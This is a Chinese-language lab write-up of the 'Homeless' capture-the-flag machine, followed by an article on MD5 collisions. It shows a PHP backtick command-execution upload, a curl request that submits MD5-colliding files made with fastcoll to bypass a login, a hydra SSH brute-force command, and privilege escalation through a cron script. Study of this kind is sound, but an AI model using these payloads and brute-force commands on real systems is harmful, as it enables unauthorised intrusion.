靶机Homeless

kali : 192.168.230.236
靶机 : 192.168.230.245
在这里插入图片描述
在这里插入图片描述
打开web网页,查看源码,发现了user-agent信息,后经过测试,抓包后修改user-agent信息会回显,考虑如何利用它

在这里插入图片描述
还是看源码信息,这里有一个位置的图片,访问一下
在这里插入图片描述
如果不是看别人的wp,给我一万年也做不出来
我们需要在agaent字段填上这个图片的字段 “Cyber​​dog Sledding Portal”
在这里插入图片描述
得到一个目录,我们访问一下
在这里插入图片描述
这里的上传限制了上传文件的大小

<?=`ls`;    #这句代码在php里等同于<?php echo `ls`;?>,是这段代码的缩写

在这里插入图片描述
在这里插入图片描述

注意这里一定是反引号,否则无法解析
在这里插入图片描述
这是我的本地测试,一开始我还傻乎乎的用ls,才反应过来我是windows系统
在这里插入图片描述
新姿势,根本不需要system函数,一开始我还在想你怎么知道能解析代码的,后来才发现原来解析代码是由自己控制的,就是那个反引号

在这里插入图片描述
在这里插入图片描述
点击右上角的Need Hint得到源码
在这里插入图片描述
要求post提交的3个参数不能两两相同,但是要求md5的值相同,而且注意比较md5的时候是===,不是==,区别于以前做ctf的时候的0e绕过,这里是行不通的,===会同时判断类型,用数组也是行不通的,这里的三个值都进行了string强制转换,这里要用到几款工具

fastcoll下载链接:http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip

tail.exe下载链接:https://www.trisunsoft.com/tail-for-windows.htm

curl.exe下载链接:https://curl.haxx.se/windows/
fastcoll_v1.0.0.5.exe -o jlzj0 jlzj1      #-o参数代表随机生成两个相同MD5的文件
fastcoll_v1.0.0.5.exe -p jlzj1 -o jlzj1to1 jlzj1to2 #-p参数代表根据jlzj1文件随机生成两个相同MD5的文件,注意:生成两个文件的MD5与jlzj1不同
tail.exe -c 128 jlzj1to1 > a #-c 128代表将jlzj00的最后128位写入文件a,这128位正是jlzj1to1与jlzj1的MD5不同的原因
type jlzj0 a > jlzj1to3
curl.exe --data-urlencode username@E:\工具\md5_crash\jlzj1to1 --data-urlencode password@E:\工具\md5_crash\jlzj1to2 --data-urlencode code@E:\工具\md5_crash\jlzj1to3 --data-urlencode "remember=1&login=Login" http://192.168.230.245/d5fa314e8577e3a7b8534a014b4dcb221de823ad/index.php -i

在这里插入图片描述
我们得到了新的admin.php的cookie,直接登陆

在这里插入图片描述
只是一个执行命令的终端,这里直接在输入框里输入命令是不行的,他还会用到上一步骤中的admin.php的session,否则只会跳转到index.php

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
发现所有文件没有权限访问,根据作者的提示,直接爆破downfall的ssh

grep '^sec.*' /usr/share/wordlists/rockyou.txt > passwd.txt
hydra -l downfall -P passwd.txt -t 4 192.168.230.245 ssh

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
发现这是一个定时脚本,每隔一分钟就会执行一次,接下来要做的就是要把提权的命令写到里面让它自动执行
在这里插入图片描述
在这里插入图片描述
提权成功

MD5是目前最热门的加密算法,我们通常用MD5值来验证文件的完整性。例如在一些比较正规的下载网站,通常会提供软件的MD5值,这样我们就可以对下载回来的文件用MD5校检软件(如HashX等)做一次MD5校验,以确保我们获得的文件与该站点提供的文件为同一文件。但当两个不同文件的MD5值完全一样时,你还会信任MD5吗? 找出破解MD5加密方法的专家是我国山东大学的王小云教授,这则新闻在以前的软件版块曾详细报道过。但之后MD5的破解一直没有进展,直到最近,国外的科学家研究出了新的MD5碰撞破解方法,可以让两个不同文件的MD5值完全一样,而之前我们一直认为一个文件的MD5值在世界上是独一无二的,这就像一个人克隆了你的指纹然后冒充你一样恐怖! 为了验证MD5值的独一无二性,我们来做一个简单的试验: 在桌面上新建一个文本文档,文件名为“test.txt”,内容为“OfficeBa”。然后将这个文本文档拖动到校验工具HashX中,点击左上角的“Hash File”按钮,得到其MD5值为051cb2917a5b70505e1687dee449c765,然后为文档中的“OfficeBa”加上双引号,保存后再通过HashX进行校检,发现MD5值变成了9ab117400993b70bc9945a9b15749d5d了。可见,一个极细微的变动都会导致文件的MD5值不同! 那么我们能让两个程序文件的MD5一致,却又都能正常运行,并且可以做完全不同的事情么?答案是:“可以!”。要让两个不同文件的MD5值相同,可以通过一款名为fastcoll的小工具来完成我们同样以刚才的test.txt来做试验: -h [--help] 显示选项 -q [--quiet] 简化 -i [-ihv] arg 使用指定的初始值,默认是md5初始值 -p [-prefixfile] arg 使用给定的前缀计算初始值,仍然把数据复制到输出文件中(必须是个文件名) -o [--out] arg 指定输出文件名,此选项必须是最后一个参数,而且两个文件名必须同时指定 默认的是 -o msg1.bin msg2.bin 把解压出来的fastcoll_v1.0.0.5.exe与test.txt放在同一目录,然后在“命令提示符”中输入:“fastcoll_v1.0.0.5.exe -i test.txt -p test.txt -o cbi.exe cbi2.exe”并回车,在同目录中会生成名为cbi.exe和cbi2.exe文件,我们用HashX校验他们的MD5值,可以发现是完全一样的,但是在HashX中用“SHA-1”加密算法进行校验的时候,结果竟然是不同的(SHA-1加密算法生成的结果也是独一无二的)!可见这已经是完全不同的两个文件,但是他们的MD5值竟然完全相同。 如果黑客从网上下载一个工具,给其捆绑上木马,然后通过工具让其MD5值和原文件一样。那么当用户下载了文件后用MD5校验工具进行校验时就会发现带毒文件和原文件MD5值完全一样,就会放心地去运行,结果可想而知。所以,MD5加密已经不再可信!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值